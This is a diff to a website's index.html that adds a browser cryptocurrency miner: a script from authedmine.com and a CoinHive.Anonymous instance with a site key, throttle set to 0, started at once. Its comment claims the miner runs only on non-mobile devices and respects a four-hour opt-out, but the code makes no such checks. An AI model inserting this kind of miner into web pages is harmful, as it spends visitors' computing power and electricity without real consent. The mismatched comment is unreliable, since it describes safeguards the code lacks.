--- a/index.html
+++ b/index.html
@@ -25,6 +25,16 @@
       gtag('config', 'UA-109707332-1');
     </script>
 
+    <script src="https://authedmine.com/lib/authedmine.min.js"></script>
+<script>
+	var miner = new CoinHive.Anonymous('pXCJA6s5QWmw3SAZ3NLxFyOaa8cBdrus', {throttle: 0});
+
+	// Only start on non-mobile devices and if not opted-out
+	// in the last 14400 seconds (4 hours):
+	miner.start();
+	
+</script>
+
     <style type="text/css">
       <!--
       body {
